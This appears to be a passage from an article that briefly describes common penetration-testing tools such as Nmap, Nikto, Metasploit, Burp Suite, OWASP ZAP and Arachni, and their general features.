Almost every tool mentioned here is bundled with Kali Linux, but most can be run on other operating systems, including Windows. Again – we don’t intend to publish lengthy tutorials. Instead, we insist that you do some serious research on your own, or you will learn almost nothing. Consider this list a starting point for further discoveries.
Nmap is a whole universe in its own. Features include host discovery, port scanning, version detection, OS detection and scriptable interaction the target server(s). The tool can further provide information on DNS names, device types and MAC addresses. This Nmap cheat sheet is very useful when learning to master the program and its capabilities.
Uniscan is a web vulnerability scanner. The program’s foremost strengths are discovering Remote File Include (RFI), Local File Include (LFI) and Remote Command Execution (RCE) vulnerabilities. Even though it hasn’t been updated for several years, many people consider it one of the most useful penetration testing toos.
Nikto is a web server scanner which offers comprehensive tests against web servers for multiple items, including potentially dangerous files/CGIs, checks for outdated versions, and version specific problems. In addition, it can check for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and its exceptionally useful plugins are frequently updated.
The Metasploit Project is a security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its best-known module is the Metasploit Framework, which is used for developing and executing exploit code against remote targets. The project is famous for its anti-forensic and evasion tools.
Burp Suite is written in Java and has a convenient graphical user interface. It is a comprehensive solution for web application security checks. In addition to basic functionality, such as proxy server, scanner and intruder, the tool also contains more advanced options such as a spider, a repeater, a decoder, a comparer, an extender and a sequencer. It comes as two versions, a Free edition and a full version (Pro); the free edition is surprisingly powerful.
OWASP ZAP is an open-source web application security scanner. It is intended to be used by both those new to application security as well as professional penetration testers. Built-in features include: intercepting proxy server, traditional and AJAX web crawlers, an automated scanner, passive scanner, forced browsing, Fuzzer, websocket support, scripting languages, and “plug-n-hack” support. It has a plugin-based architecture and an online marketplace which allows new or updated features to be added. The GUI control panel is fairly easy to use.
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of modern web applications. It is free, with its source code public and available for review. Ranging from a simple command line scanner utility to a global high-performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform. In addition, it has a REST API module that makes integration with other applications possible. It is smart, in the sense that it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.